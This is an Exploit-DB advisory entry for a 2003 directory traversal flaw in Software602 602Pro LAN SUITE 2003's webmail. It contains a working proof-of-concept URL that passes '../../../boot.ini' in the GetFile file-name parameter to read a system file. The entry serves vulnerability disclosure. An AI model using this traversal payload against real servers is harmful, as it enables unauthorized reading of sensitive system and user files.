software602 602pro lan suite 2003 - Directory Traversal

EDB-ID:

23185

CVE:

N/A




Platform:

Windows

Date:

2003-09-25


source: https://www.securityfocus.com/bid/8701/info

A problem with the handling of directory traversal requests has been identified in Software602 602Pro LAN SUITE 2003. Because of this, an attacker may be able to gain access to potentially sensitive information. 

http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini

where USER signifies the current webmail user's username.